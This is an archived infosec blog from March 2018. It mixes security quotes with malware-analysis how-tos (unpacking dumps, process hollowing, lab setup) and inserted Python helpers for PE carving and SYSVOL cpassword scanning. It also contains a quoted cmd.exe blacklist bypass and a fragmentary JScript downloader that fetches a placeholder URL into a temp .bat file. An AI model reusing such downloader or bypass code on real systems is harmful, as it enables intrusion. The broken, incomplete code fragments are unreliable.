Saturday, March 31, 2018

Infosec quotes - patch, limit admin

“...things you can do to limit enterprise breaches:

1. Patch vulnerabilities as soon as possible. 
2. Limit administrative privileges.
3. See numbers 1 and 2.
4. Block uncategorized domains at the proxy.
5. Disallow JAR/EXE/ISO/BAT/VBS/PS1/HTA/JS attachments on inbound emails.


Infosec quotes - remote copy and paste

Remote copy and paste? Yikes.

Friday, March 30, 2018

Infosec quotes - debug mode

Developers, make sure debug mode is disabled before you go live in production. Leaving it on can lead to very bad things.

Infosec quotes - double whammy

Double whammy: you get a fake Flash Player malvertisement that runs a bitcoin miner in your browser, and if you then install the fake Flash Player, the payload is the Azorult info stealer.

viewing virtualalloc contents

1. Run the malware under x64dbg and set a breakpoint on VirtualAlloc:

BPX VirtualAlloc

2. When the breakpoint hits, look in the call stack for the last frame in user code, go there, and set a breakpoint on the line right after the user-code call to VirtualAlloc.

3. When that breakpoint hits, look at EAX: it holds the newly allocated address. Follow EAX's value in the dump.

4. Press F8 (step over) one line at a time until data appears in the dump. It may be plain data (such as IP addresses) or a full executable (MZ header).

5. If it is an executable (MZ header), right-click and choose "Follow in memory map", then right-click the address in the memory map and select "Dump memory to file".

6. Open the dumped EXE in PE Bear. If the .text section is all zeros, go to the Section Hdrs tab and change every Raw Addr value to match its Virtual Addr, then go to the Optional Hdr tab and change Image Base to the address shown on the Memory Map screen in x64dbg.

7. Open the result in pestudio; the EXE should now look normal (unpacked), with URLs, IPs, IOCs, etc.

Thursday, March 29, 2018

Infosec quotes - no more single factor

“Password-based, single-factor authentication is no longer a sufficient access control to systems containing sensitive or private information, a fact that is widely known but continues to be a huge weakness for organizations.”

debugging create process, dumping executable content

Try setting a breakpoint on

because those are among the lowest-level APIs for creating a process, and most of the higher-level API calls funnel down to them eventually.

Once the breakpoint hits, go to the x64dbg Memory Map and look for regions with "Protection=ERW" (executable, read, write), especially outside the normal places.

Look for an MZ header to find a full executable in memory.

Once found, right-click the region in the memory map, choose "Dump memory to file", and save the executable.

Load it into PE Bear. If the .text section is all zeros, the dump still has its in-memory (section-aligned) layout, so you must
- copy the Virtual Addr. column values into the Raw Addr. column on the Section Hdrs tab
- on the Optional Hdr tab, change the Image Base to the 'address' field of the region in the x64dbg memory map
- save the executable under a different name

Infosec quotes - sanitize input

Developers, don’t forget to sanitize any data coming in to your application. 

api monitor places to capture unpacked buffer

ntdll.RtlDecompressBuffer (breakpoint AFTER the call, because the output buffer is only filled when the call returns)
_Out_ PUCHAR UncompressedBuffer,

kernel32.WriteProcessMemory (breakpoint BEFORE the call, because the input buffer is already complete when the call is made)
_In_  LPCVOID lpBuffer,

Infosec quotes - Cisco hard coded cisco password

“… allow an unauthenticated, remote attacker to log in to a device running an affected release of Cisco IOS XE Software with the default username and password that are used at initial boot. CVE-2018-0150 ...”

Wednesday, March 28, 2018

Process Hollowing 101

If you see a process creating a copy of itself, process hollowing may be occurring.

Use the "API Monitor" freeware and set it to watch:
- CreateProcess
- WriteVirtualMemory
- ResumeThread

Run the sample and find the WriteVirtualMemory API call whose buffer appears to contain an EXE (MZ header).

Set a breakpoint on WriteVirtualMemory "before call".

Re-run the sample.

When the breakpoint hits, choose Edit Buffer and note the starting address.

Open HxD and attach to the memory of the running (currently breakpointed) process.
Search for that starting address.
Collapse the buffer to find the start and end addresses.
Use Select Block and enter the end address.
Copy the contents.

Paste into a new HxD hex editor window and save as a new EXE.

Now you have the unpacked program!
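Both of the dump write-ups above (the VirtualAlloc and create-process dumps that need the PE Bear Raw Addr / Image Base fix-up, and the WriteVirtualMemory buffer where you have to locate where the MZ image starts and ends) can be scripted. The Python below is an added example, not code from the original post or from x64dbg, PE Bear or API Monitor: carve_pe() finds MZ/PE images inside a captured buffer and works out each image's extent from its own headers, and unmap_dump() rewrites a memory dump's section headers and ImageBase the way the PE Bear steps describe. build_sample_pe() constructs a minimal one-section PE32 purely for demonstration; every address in it, and the dump address 0x6A0000 used in the comments, is made up.

```python
# Added example, not from the original post: scripted versions of the two manual
# steps (carve an MZ/PE image out of a captured buffer; apply the PE Bear
# Raw Addr / Image Base fix-up to a memory dump). Pure struct, no pefile needed.
import struct

E_LFANEW_OFF = 0x3C        # DOS header field that points at "PE\0\0"
FILE_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40

def _pe_layout(buf, mz_off):
    """Validate an MZ/PE pair at mz_off; return (opt_off, sec_off, n_sections) or None."""
    if buf[mz_off:mz_off + 2] != b"MZ" or mz_off + 0x40 > len(buf):
        return None
    e_lfanew, = struct.unpack_from("<I", buf, mz_off + E_LFANEW_OFF)
    nt_off = mz_off + e_lfanew
    if e_lfanew > 0x1000 or nt_off + 4 + FILE_HEADER_SIZE > len(buf):
        return None
    if buf[nt_off:nt_off + 4] != b"PE\0\0":
        return None
    n_sections, = struct.unpack_from("<H", buf, nt_off + 6)    # FileHeader.NumberOfSections
    opt_size, = struct.unpack_from("<H", buf, nt_off + 20)     # FileHeader.SizeOfOptionalHeader
    opt_off = nt_off + 4 + FILE_HEADER_SIZE
    sec_off = opt_off + opt_size
    if sec_off + n_sections * SECTION_HEADER_SIZE > len(buf):
        return None
    return opt_off, sec_off, n_sections

def carve_pe(buf, mapped=False):
    """(offset, length) of every PE image in buf. File layout: the image ends where the
    furthest section's raw data ends. mapped=True: buffer is an in-memory image, use SizeOfImage."""
    hits, pos = [], buf.find(b"MZ")
    while pos != -1:
        layout = _pe_layout(buf, pos)
        if layout:
            opt_off, sec_off, n = layout
            if mapped:
                end, = struct.unpack_from("<I", buf, opt_off + 56)   # OptionalHeader.SizeOfImage
            else:
                end, = struct.unpack_from("<I", buf, opt_off + 60)   # OptionalHeader.SizeOfHeaders
                for i in range(n):
                    raw_size, raw_ptr = struct.unpack_from("<II", buf, sec_off + i * SECTION_HEADER_SIZE + 16)
                    end = max(end, raw_ptr + raw_size)
            hits.append((pos, min(end, len(buf) - pos)))
        pos = buf.find(b"MZ", pos + 1)
    return hits

def _image_base_field(buf, opt_off):
    """(struct format, absolute offset) of ImageBase for PE32 (0x10B) or PE32+ (0x20B)."""
    magic, = struct.unpack_from("<H", buf, opt_off)
    if magic == 0x10B:
        return "<I", opt_off + 28
    if magic == 0x20B:
        return "<Q", opt_off + 24
    raise ValueError("unknown optional header magic 0x%x" % magic)

def image_base(buf):
    opt_off, _, _ = _pe_layout(buf, 0)
    fmt, off = _image_base_field(buf, opt_off)
    return struct.unpack_from(fmt, buf, off)[0]

def read_section(buf, index):
    """The bytes a static tool reads for section `index` (from file offset PointerToRawData)."""
    _, sec_off, _ = _pe_layout(buf, 0)
    raw_size, raw_ptr = struct.unpack_from("<II", buf, sec_off + index * SECTION_HEADER_SIZE + 16)
    return bytes(buf[raw_ptr:raw_ptr + raw_size])

def unmap_dump(dump, dump_address):
    """Rewrite a memory dump so file offsets equal RVAs: Raw Addr := Virtual Addr,
    raw size := virtual size, ImageBase := the address the region was dumped from."""
    buf = bytearray(dump)
    layout = _pe_layout(buf, 0)
    if layout is None:
        raise ValueError("not a PE image")
    opt_off, sec_off, n = layout
    fmt, off = _image_base_field(buf, opt_off)
    struct.pack_into(fmt, buf, off, dump_address)
    for i in range(n):
        hdr = sec_off + i * SECTION_HEADER_SIZE
        vsize, vaddr = struct.unpack_from("<II", buf, hdr + 8)      # VirtualSize, VirtualAddress
        struct.pack_into("<II", buf, hdr + 16, vsize, vaddr)         # SizeOfRawData, PointerToRawData
    return bytes(buf)

def build_sample_pe(mapped):
    """Constructed one-section PE32 (not a real binary). .text: VirtualAddress 0x1000,
    PointerToRawData 0x400. mapped=False is file layout; mapped=True is memory layout, so
    offset 0x400 holds header padding (zeros): the 'text section is all 0s' symptom."""
    code = b"\x55\x8b\xec\x5d\xc3".ljust(0x200, b"\x90")     # push ebp; mov ebp,esp; pop ebp; ret
    dos = (b"MZ" + b"\0" * (E_LFANEW_OFF - 2) + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt_hdr = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 3,
                          0x10B, 14, 0, 0x200, 0, 0, 0x1000, 0x1000, 0x2000,
                          0x400000, 0x1000, 0x200,            # ImageBase, SectionAlignment, FileAlignment
                          4, 0, 0, 0, 4, 0,
                          0, 0x2000, 0x400).ljust(224, b"\0")  # SizeOfImage, SizeOfHeaders
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + file_hdr + opt_hdr + sect
    if mapped:
        return headers.ljust(0x1000, b"\0") + code.ljust(0x1000, b"\0")
    return headers.ljust(0x400, b"\0") + code
```

With a real dump, pass the bytes of the file x64dbg wrote and the region's address from the memory map to unmap_dump(), then read_section() should return code instead of zeros. For a buffer that is still laid out as an image rather than as a file, call carve_pe() with mapped=True so the extent comes from SizeOfImage instead of the section table; the section-table extent would stop short.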

rep movsb is like memcpy

When looking at assembly and you see

rep movsb

it can be thought of as a string or memory copy.
It copies from the address in register ESI to the address in register EDI:
ESI = the existing malicious code to copy
EDI = the empty VirtualAlloc'd memory to copy the malicious code into

Tuesday, March 27, 2018

Infosec quotes - DA/EA

“... Do not.  Let DA/EA accounts. Log in.  To ANYWHERE. Except:
1) domain controllers
2) Triple-secured admin server ...” 

Infosec quotes - fake updates


Infosec quotes - image with ExE inside

Malware using images with embedded executables. 

Infosec quotes - APT adware

What’s your org's stance on adware?

“... Adware is often ignored during security operations because it  ... has a low perceived threat level .... Advanced Persistent Adware (APA), is unique because it ...  evade detection, maintain persistence, and connect to a Command and Control (C2) server to facilitate the second stage of the attack...” 

Monday, March 26, 2018

Infosec quotes - rackspace phish

Phishing that claims your Rackspace account has been blocked.

Infosec quotes - disable UAC

“... document with macro
1) disables UAC
2) lowers macro security

Sunday, March 25, 2018

Infosec quotes - wire transfer scams

“... Before submitting any type of wire transfer, contact the alleged recipient via phone first to confirm the transfer. This will help avoid falling prey to phishing scams...” 

Infosec quotes - internal recon

“... Net User/Group /domain is heavily used by attackers to perform reconnaissance...” 

Infosec quotes - PCI TLS

“... PCI DSS requires all retailers to turn off SSL, TLS 1.0 and 1.1 by June...” 

Saturday, March 24, 2018

Infosec quotes - csv file malware

Did you know .CSV files can deliver malware too?

Infosec quotes - excel macro interaction

“... Excel macro attempts to evade sandboxes by only triggering when the user interacts with the spreadsheet. It drops a #PowerShell payload ...” 

Infosec quotes - laptop encryption

Take laptop encryption seriously and don’t allow users to get exceptions.

“... If a properly encrypted device that contains protected health information is lost or stolen, there is no data breach ...”

Infosec quotes - external websites go in the DMZ

Public-facing web servers (IIS, Apache, WebLogic, etc.) should always be in your DMZ.

“... general use case is that the application server has a public face, it can be remotely rooted. If that happens, and a malicious party gains access to your server, he should be isolated in the DMZ network and not have direct access to the private hosts ...” 

Infosec quotes - default password google search

“... No need to hack in, just do a Google search on default password, cuz you know humans are often lazy ... many do not change the passwords...” 

Infosec quotes - password length

“... Length is more powerful than complexity because lengthening passwords makes them exponentially harder to crack....passphrases over complex passwords!”

Infosec quotes - java 6 on internet

“... If you use Java 6 on a server exposed to the public internet, you are asking to be hacked.  Kind of like running an Win NT4 or 2K server on the internet...”

Infosec quotes - externally exposed admin page

Don’t expose org admin pages to the internet; put them behind a VPN or something similar. And change their default passwords!

“... sensitive control panel exposed to the internet with admin/admin ...” 

Infosec quotes - company default password

It is a bad idea for your help desk or app admins to give everybody the same new default password. Each one should be unique.

“... Just managed to get 150 accounts including 1 domain admin by spraying the company's default password, and it takes all the fun out of the pen test...” 

Infosec quotes - remove admin rights

“... one of the key findings is by removing admin rights from users you lessen your risk by up to 80%.  By simply limiting these privileges you could close the door on countless potential attacks...”

Infosec quotes - punycode

Consider setting network.IDN_show_punycode to true in about:config if using @firefox 

Infosec quotes - kubernetes

“... If your users have network access to your nodes, then the kubelet API is a full featured unauthenticated API backdoor to your cluster....” 

Infosec quotes - upgrade license

Malicious word doc with interesting popup message.

“... Error 19874: You must have Office Professional Edition to read this content, please upgrade your license...”

Friday, March 23, 2018

Infosec quotes - visual studio code rce

“... Visual Studio Code (1.19.0 to 1.19.2) was silently listening on 9333/tcp. It was a debug port with obvious Remote Code Execution ...”

Infosec quotes - chromos

“... Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application ...” 

Infosec quotes - uninstall AV

Malware that uninstalls your antivirus. 

Thursday, March 22, 2018

Infosec quotes - notes nsf

IBM Lotus Notes vulnerability.

“... Have an unsuspecting user double-click the nsf file ...” 

Infosec quotes - chafer windows updates

“... Iranian threat group #Chafer masquerade as a windows update ...” 

Infosec quotes - on close

Malicious Word doc that doesn’t run its macro until Office is closed.

Infosec quotes - chrome updates

Don’t click ads that say to update Google Chrome. They deliver malware. 

Tuesday, March 20, 2018

Infosec quotes - EOL router

“... The Cisco router that was abused was an "end of life" network device that ultimately gave the attackers an attack vector...”

Infosec quotes - psexec clear text

“... The developer is using PsExec to execute a script on a remote server. Used in this way (with '-u' and '-p' options), PsExec sends the credentials in clear text across the network...”

Infosec quotes - vt script

“... The password was a strong one but once the file is published on VT, you can consider the password as lost...” 

Monday, March 19, 2018

Infosec quotes - real time queue

Incident Responders need to work their queues in near real-time. Looking at alerts that are days old just doesn’t cut it.

“... CrowdStrike's Global Threat Report found that the average time it takes for an intruder to begin moving laterally to other systems in your network, once a machine has been compromised and a beachhead established, is 1 hour and 58 minutes...” 

Infosec quotes - firewall off

Developers please realize this is always the wrong solution.

“... The developers haven't had any development issues since they were issued root accounts and we disabled the firewall. *Dusts off hands* ...” 

Infosec quotes - sql server Powershell

The PowerShell bundled with SQL Server is the old 2.0 version with no logging.

“... Living off the land, in a cave with no logging. SQLPS.exe version shown bundled with SQL Server 2008....”

Infosec quotes - you are breached

If a security researcher says you are breached at least take a few minutes to look into it a bit.

“... you reach out to a company to alert them to a network compromise, they flat out state they are doing just fine, and then you find the keylogger dump for that exact email on a C2 server...“ 

Sunday, March 18, 2018

Infosec quotes - Schneider

“... Shodan ... 1.6k+ Schneider structure and energy automation systems are connected to the internet ... NO-AUTH LUA SHELL on port 23...” 

Infosec quotes - admin and patching

“... [User local admin rights] * [unpatched user softwares] =  hack easiness...” 

Saturday, March 17, 2018

Infosec quotes - millions in ransom

The cost of poor DR and backup planning.

“... Linux ransomware attack that demanded an unprecedented 550 Bitcoins (BTC) or $1.62 million ransom ... On 14 June 2017 the web hosting company was able to negotiate the ransom down to 397.6 BTC, nearly $1.01 million, to be paid in three installments...” 

Infosec quotes - fake flash info stealer

Fake Flash Player install is

“... being used to push binary “info stealing” malware to Windows computers...” 

Infosec quotes - exfil via gmail attachments

“... PowerShell-RAT exfils data through Gmail attachments...” 

Infosec quotes - injects macros into word docs

“...continuously monitors for doc files ... injects macros into doc files ...” 

Infosec quotes - ad as c2

“... It solves Network segmentation Issues.
Bypasses Internal Firewalls.
No traffic sent to the target....” 

Infosec quotes - Walmart mbm bucket

It’s a broken record by now, but here is another open S3 bucket.

“... The open S3 bucket, named “walmartsql,” housed an MSSQL database backup ... encrypted credit card details, payment details ... gives the appearance that this is the main customer database for MBM Company Inc.,..” 

Friday, March 16, 2018

Infosec quotes - espionage

“... TTPs from 🇨🇳 espionage
 > PowerShell + bitsadmin + WMI
 > Backdoor comms to legit sites including Github & Technet

Infosec quotes - multi factor required

Any public-facing system (email, portals, VPNs, payroll, ticketing systems, etc.) absolutely requires multi-factor authentication nowadays; otherwise one stolen credential and your data is gone.

“... The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. ..”

Infosec quotes - Russian local admin

You should eliminate local admin accounts and work towards least privilege. If you haven’t done that yet you better be frequently auditing and monitoring both the accounts and their activity.

“... The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts...” 

Thursday, March 15, 2018

Infosec quotes - updating flash

Let your IT department update your Flash Player; don’t try to do it yourself.

Malicious “Flash Offer” followed by “flash_setup.exe” 

Infosec quotes - good IT admin

“... 80% of IT Security is just good IT administration. You can't defend what you don't know exists, and you can't detect unusual if you don't know what's normal...” 

Malware Research Lab software installation ideas

Windows Lab Setup
0.) microsoft office was installed & licensed
1.) download & install chrome
2.) download & install notepad++
3.) download notepad++ JStool plugin & add to plugin folder
4.) download notepad++ Compare plugin & add to plugin folder
5.) download & install 7zip
6.) download & install adobe reader
7.) download & install adobe flash
8.) download & install java
9.) download & install python 2
10.) download & install python 3
11.) download & install process hacker
12.) download & install wireshark & winpcap
13.) download & install move mouse (and .net 3.5 if necessary)
14.) download pestudio
15.) download procmon
16.) download regshot
17.) change folder options to "show hidden files"
18.) change folder options to "show known file extensions"
19.) download PEiD
20.) download DIE (detect it easy)
21.) download ProcDot & graphviz & windump
22.) disable windows defender
23.) disable windows firewall
24.) download officemalscanner
25.) download python scripts, create batch script wrappers to drag & drop files, (python2 -m pip install oletools)
26.) download xorsearch.exe
27.) download scdbg.exe
28.) download jmp2it.exe
29.) download punbup.exe
30.) download lnk_parser_cmd.exe
31.) api monitor
32.) x64dbg
33.) HxD
34.) process explorer
35.) PE Bear

XX.) Rename the common ones (like process explorer, process hacker, wireshark, etc.) to avoid malware that is specifically looking for those executable names
XX.) Restart virtual machine
XX.) Snapshot virtual machine

python script wrapper so you can drag and drop malware onto a script

Save the lines as a .bat file; "%1" is the path of the file dropped onto it (quoted so paths with spaces work):

punbup.exe -d "%1" | findstr "DetectionName OriginalName"
punbup.exe -c md5 "%1"

Same wrapper pattern for a Python tool (the script path is not shown):

python2.exe -d "%1" | findstr "DetectionName OriginalName"
python2.exe -c md5 "%1"

Finding sysvol passwords to cleanup

Find Group Policy Preferences passwords. To check whether any are present in your domain, run this command:

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
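The same check as a script, added here as an example (not from the original post): it walks a SYSVOL copy, parses each policy XML, and reports every element that carries a cpassword attribute together with the account it belongs to and whether the value is empty (findstr matches an empty cpassword="" too, and those hold no secret). Nothing is decrypted. build_sample_sysvol() writes a constructed tree under a temp directory; the domain name, GPO GUID placeholder and cpassword value are all made up. Point scan_sysvol() at \\<FQDN>\sysvol\<FQDN>\policies (or a copy of it) for the real thing.

```python
# Added example, not from the original post: structured version of the findstr
# check. Reports cpassword attributes under a SYSVOL tree; decrypts nothing.
import os
import tempfile
import xml.etree.ElementTree as ET

# Attributes the GPP XML files use to name the account a stored credential belongs to.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

def scan_sysvol(root):
    """Return one finding (dict) per element with a cpassword attribute under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except ET.ParseError:
                continue                      # damaged or non-XML file: skip rather than crash
            for elem in tree.iter():
                for attr, value in elem.attrib.items():
                    if attr.lower() != "cpassword":
                        continue
                    account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
                    findings.append({
                        "file": path,
                        "element": elem.tag,
                        "account": account,
                        "empty": value == "",   # findstr flags these too, but they hold no secret
                    })
    return findings

def build_sample_sysvol():
    """Write a constructed SYSVOL fragment to a temp dir and return its path.
    The cpassword value below is a made-up placeholder, not a real GPP blob."""
    root = tempfile.mkdtemp(prefix="sysvol_sample_")
    prefs = os.path.join(root, "example.test", "Policies", "{GPO-GUID-PLACEHOLDER}",
                         "Machine", "Preferences")
    samples = {
        "Groups/Groups.xml":
            '<Groups>\n <User name="LocalAdmin">\n'
            '  <Properties action="U" userName="LocalAdmin" cpassword="PLACEHOLDER-NOT-A-REAL-BLOB"/>\n'
            ' </User>\n</Groups>\n',
        "ScheduledTasks/ScheduledTasks.xml":
            '<ScheduledTasks>\n <Task name="Cleanup">\n'
            '  <Properties action="C" runAs="SVC-CLEANUP" cpassword=""/>\n'
            ' </Task>\n</ScheduledTasks>\n',
        "Registry/Registry.xml":
            '<RegistrySettings>\n <Registry name="Setting">\n'
            '  <Properties action="U" key="SOFTWARE\\Example" name="Setting" value="1"/>\n'
            ' </Registry>\n</RegistrySettings>\n',
    }
    for rel, text in samples.items():
        path = os.path.join(prefs, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write('<?xml version="1.0" encoding="utf-8"?>\n' + text)
    return root

if __name__ == "__main__":
    for f in scan_sysvol(build_sample_sysvol()):
        state = "EMPTY" if f["empty"] else "SET"
        print("%s  <%s>  account=%s  cpassword=%s" % (f["file"], f["element"], f["account"], state))
```

Each finding names the file, the element and the account, which is what you need to decide whether to remove the preference item outright or replace it with LAPS-managed credentials; the Registry.xml file in the sample produces no finding because it carries no cpassword attribute.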

Infosec quotes - sysvol passwords

Cleanup is still needed after LAPS implementation.

“... often/still find Group Policy Preferences passwords ...”

Infosec quotes - icebreaker

Hacking has been made too easy.

“... When you're cold and alone staring in at an Active Directory party but don't possess even a single AD credential ...  Sequentially automates 5 internal network attacks ... Use the --auto option to automatically acquire domain admin privileges ...” 

Infosec quotes - win 10 quick support

“... Windows 10 thing ... It has something called quicksupport.exe. It allows you to easily remote control another windows 10 machine with the use of a 6 digit code. Super feature for remote controlling others or if you are not a fan of Teamviewer...” 

Wednesday, March 14, 2018

Infosec quotes - blacklist vs whitelist

Which is more manageable in the long-run?

Blacklisting = infinite number of unknown undefined software you’ll be adding to your blacklist, never ending daily additions

Whitelisting = finite number of software your users are actually using, with occasional additions here and there when users have a new requirement

Infosec quotes - Powershell malware

“ number of PowerShell malware samples that McAfee observed in 2017 was a massive 432% higher than the number observed in 2016...”

Infosec quotes - patching

“... install patches after a reasonable delay ... and test. Just as long as you install them...” 

Infosec quotes - Powershell prompts

“... PowerShell script was posted on Github recently that prompts a victim to enter their login credentials, checks if they are correct, and then sends the credentials to a remote server...”

Infosec quotes - fake flash miner

Fake flash player leads to bitcoin miner 

Infosec quotes - admin internet access

“... All admin accounts should be separated with no internet access...”

Infosec quotes - walk in and infect

Just how easy it is to walk into an org and infect their PCs with malware. 

Tuesday, March 13, 2018

Infosec quotes - domain admin internet

@frankmorris said “Allowing domain admin accounts unrestricted access to the Internet is a very bad idea. Please don’t do it or you will be pwned!” 

Infosec quotes - dns logging

DNS logging always has value.

“... Attacks ... have many possible avenues of detection over the network, but a consistent feature of almost all attacks is their usage of DNS...” 

Infosec quotes - hack email and send more

“... gained access to two official email accounts before sending out a series of emails to other government departments ...” 

Infosec quotes - iran

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign 

Infosec quotes - thumb drive quotes

How well does your org control which USB devices users can plug in? Thumb drives are scary.

“... 29 ways in which attackers could use USB devices to compromise users' computers...”

Infosec quotes - zip with shortcut

Nobody will ever send you a legitimate zip file with a Windows shortcut inside it, so don’t click them; they are malicious.

Monday, March 12, 2018

Infosec quotes - throw away domains

Malicious urls that are basically used once then taken down.

“... register throw-away domains ... HTA runs a .JSE with PowerShell, then the actor de-registers the website...” 

Infosec quotes - passwords in word doc

If you ever get into a position and see a word doc or spreadsheet full of passwords ... say something ... cause they’re doing it wrong. 

Sunday, March 11, 2018

Infosec quotes - disable legacy features

“... Disable Windows Legacy  Features
- Disable WPAD
- Disable LLMNR
- Disable NetBIOS
- Disable Windows Scripting Host (WSH) File Extensions
- Ensure WDigest is disabled
- Remove SMB v1 support 

Infosec quotes - whole org password reset

“... if you have to reset your whole orgs password, how do you calculate that cost? ...”

Infosec quotes - brute login checker

“... With the appropriate login checker and proxy lists to call upon, crooks can turn a single password breach into multiple account breaches, and clean out dozens of accounts within hours of the compromise...” 

Saturday, March 10, 2018

Infosec quotes - red team wins

“... As the Red Team, do we win all the time? Yes we do!  If blue teams improve their defenses, we win because they improve, even if we don't achieve Domain Admin
Remember we are trying to help and improve defenses, otherwise you are missing the point and no better than the attackers...” 

Infosec quotes - rar file extension

“... The .rar extension should hopefully be a red flag for users...” 

Infosec quotes - threat hunting

“... Engaging in threat hunting means that you are taking a more proactive approach to cyber defense. It often begins with the assumption that, regardless of the defenses in place, that there is always the potential that there is a threat that may have evaded detection...” 

Infosec quotes - Powershell & sysmon

PowerShell and Sysmon logging to your SIEM is important for visibility.

“... Without logging place, you won’t be able to detect a memory (RAM) only credential harvesting attack via PowerShell... A centralized logging solution is highly recommended for PowerShell and Sysmon logging...”

Infosec quotes - Incident Response prep

A key part of Incident Response success. 

“... Educate incident responders with what is ‘normal’ within the environment—installed software, permitted ports and protocols, acceptable use policies, etc...”

Infosec quotes - av is not dead

“... I know AV is supposedly dead and all that, but any decent AV would have prevented this developer's apps from being infected with the Ramnit worm…” 

Infosec quotes - risk acceptance

Risk acceptance should be temporary and require renewal so that owners can reflect on past decisions and determine if new mitigations or better options now exist.

“... Just because you accepted the risk before and it worked out so far, it doesn't mean it won't go wrong eventually...” 

Infosec quotes - printer to domain admin

Take seriously the security hardening of everything you plug into your network. Even printers.

“... It's just a printer... What's the worst that could happen? [SPOILER] Look at me.. I'm the Domain Admin now...” 

Friday, March 9, 2018

Infosec quotes - http CNET

Users shouldn’t be downloading their own software, especially not from download sites like CNET; IT needs to vet it first. And never download from insecure HTTP sites, or this could happen.

“... Targeted users in Turkey and Syria who downloaded Windows applications from official vendor websites including Avast Antivirus, CCleaner, Opera, and 7-Zip were silently redirected to malicious versions by way of injected HTTP redirects...” 

Infosec quotes - 700 emotet urls

Here’s what your security team is up against. Emotet phishing campaigns are blasted out daily from attackers to your users. Each day's campaign has new URLs, new payloads, and new C2 traffic. Yesterday’s batch had 700 URLs in one day.

Infosec quotes - fast flux

A good example of why your security team needs real-time DNS logs.

“... Here’s a simple illustration: If criminals assign a set of IP addresses that change every 150 seconds, users who access are actually connecting to different infected machines every single time...” 

Infosec quotes - block HTA scripts

“...hta powersploit script targeting energy sector ... If you don’t block hta files yet you should ...” 

Infosec quotes - infected by your router

Get infected while configuring your home router.

“... Winbox Loader, an application developed ... to help users configure their routers.’ ... works by downloading some DLLs from the router itself, but the Slingshot group replaced these files with malicious ones that infected the user when he tried to configure  his router ...” 

Infosec quotes - server patching

“... if you have Windows Servers (including 2012 and 2016) which didn’t get hit by WannaCry but still aren’t patched for MS17-010 (SMB1 vulns) then patch now, there’s a crypto mining worm...” 

Thursday, March 8, 2018

Infosec quotes - more hardcoded passwords

This shouldn’t be happening anymore and you’d hope that all of them have been found by now. Wow.

“... Cisco says that an attacker could exploit this vulnerability (CVE-2018-0141) by connecting to the affected system via Secure Shell (SSH) using the hardcoded password...” 

Infosec quotes - always another way

Blacklisting doesn’t work. There's always another way.

“... filter cmd.exe ? try this 
rundll32.exe shell32.dll,ShellExec_RunDLL calc.exe ...” 

Tuesday, March 6, 2018

Infosec quotes - google internal admin pages

The dangers of hooking a company up to the internet in any fashion.

“... Bypassing Google’s authentication to access their Internal Admin panels...” 

Monday, March 5, 2018

Infosec quotes - mailchimp malware

Mailchimp delivering malware invoices since December. 

Infosec quotes - joomla plain text

“... Simple flaw exposes plaintext password for Database, FTP, SMTP servers' of thousands of #Joomla websites...” 

Infosec quotes - bucket to full compromise

Cloud buckets are scary. Do you know what your users are putting out there?

“... Identified open S3 bucket -> backup files -> credential file -> partial compromise of AWS -> pivot to other cloud instances -> credential file -> full compromise ...” 

Infosec quotes - kali is a Windows app

Do you control what apps your users can download from the App Store?

“... Kali Linux is now an App in the Windows Store. Have Kali run natively in Windows...” 

Infosec quotes - domain admin outside AD

Gaining Domain Admin from Outside Active Directory 

“... mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account...” 

Infosec quotes - cameras shodan

“... More than 110 thousand cameras exposed in the shodan can be explored ...” 

Sunday, March 4, 2018

Infosec quotes - defender blocks flash player HTA

Windows Defender has blocked 1 million malicious HTA files this year already, mostly fake Flash Player updates delivering Kovter.

Infosec quotes - fake chrome updates

Fake updates to Chrome and Flash lead to Ramnit Trojan. 

Saturday, March 3, 2018

Infosec quotes - using what is available

Using what’s already available 

“... COM object interaction w/Internet Explorer to download payload ... powershell.exe loads ieproxy.dll, svchost.exe spawns iexplore.exe, iexplore.exe makes network connection...”

Friday, March 2, 2018

Infosec quotes - exchange compromise AD

“... is possible from the Exchange Windows permissions (EWP) security group to compromise the entire prepared Active Directory domain...”  

Infosec quotes - costly emotet

Even the routine phishing campaigns seen daily can be devastating.

“... Emotet Attack Costs City of Allentown, PA $1 Million...” 

Thursday, March 1, 2018

Sample javascript downloader (wscript.exe)

var url = "???url???"
var filepath = "c:\\windows\\temp\\????.bat"
var xhr = new ActiveXObject("MSXML2.XMLHTTP")"GET", url, false)

if (xhr.Status == 200) {

var fso = new ActiveXObject("Scripting.FileSystemObject")
if (fso.FileExists(filepath))

var stream = new ActiveXObject("ADODB.Stream")
stream.Type = 1
stream.Position = 0

var objShell = new ActiveXObject("");